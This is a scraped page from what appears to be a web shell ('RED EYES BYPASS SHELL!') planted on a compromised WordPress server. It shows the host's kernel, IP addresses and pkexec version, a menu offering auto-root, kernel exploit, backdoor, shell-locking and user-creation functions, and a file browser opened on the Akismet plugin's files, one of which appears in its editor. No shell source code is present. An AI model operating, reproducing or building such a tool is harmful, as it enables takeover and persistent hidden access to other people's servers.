Linux sothorn202 5.15.0-161-generic #171-Ubuntu SMP Sat Oct 11 08:17:01 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 202.28.82.202 | : 216.73.216.9
pkexec version 0.105
Cant Read [ /etc/named.conf ]
iqtd
RED EYES BYPASS SHELL!
Terminal
Auto Root
Adminer
Backdoor Destroyer
Kernel Exploit
Lock Shell
Lock File
Create User
+ Create Folder
+ Create File
/
home /
iqtd /
wp-content /
plugins /
akismet /
views /
[ HOME SHELL ]
NAME
SIZE
PERMISSION
ACTION
.htaccess
127
B
-rw-r--r--
activate.php
179
B
-rw-r--r--
config.php
14.95
KB
-rw-r--r--
connect-jp.php
4.97
KB
-rw-r--r--
enter.php
1.02
KB
-rw-r--r--
footer.php
401
B
-rw-r--r--
get.php
1
KB
-rw-r--r--
logo.php
770
B
-rw-r--r--
notice.php
15.01
KB
-rw-r--r--
predefined.php
312
B
-rw-r--r--
setup.php
337
B
-rw-r--r--
start.php
817
B
-rw-r--r--
stats.php
1.05
KB
-rw-r--r--
title.php
125
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : get.php
<?php //phpcs:disable VariableAnalysis // There are "undefined" variables here because they're defined in the code that includes this file as a template. $submit_classes_attr = 'akismet-button'; if ( isset( $classes ) && ( is_countable( $classes ) ? count( $classes ) : 0 ) > 0 ) { $submit_classes_attr = implode( ' ', $classes ); } ?> <form name="akismet_activate" action="https://akismet.com/get/" method="POST" target="_blank"> <input type="hidden" name="passback_url" value="<?php echo esc_url( Akismet_Admin::get_page_url() ); ?>"/> <input type="hidden" name="blog" value="<?php echo esc_url( get_option( 'home' ) ); ?>"/> <input type="hidden" name="redirect" value="<?php echo isset( $redirect ) ? esc_attr( $redirect ) : 'plugin-signup'; ?>"/> <button type="submit" class="<?php echo esc_attr( $submit_classes_attr ); ?>" value="<?php echo esc_attr( $text ); ?>"><?php echo esc_attr( $text ) . '<span class="screen-reader-text">' . esc_html__( '(opens in a new tab)', 'akismet' ) . '</span>'; ?></button> </form>
Close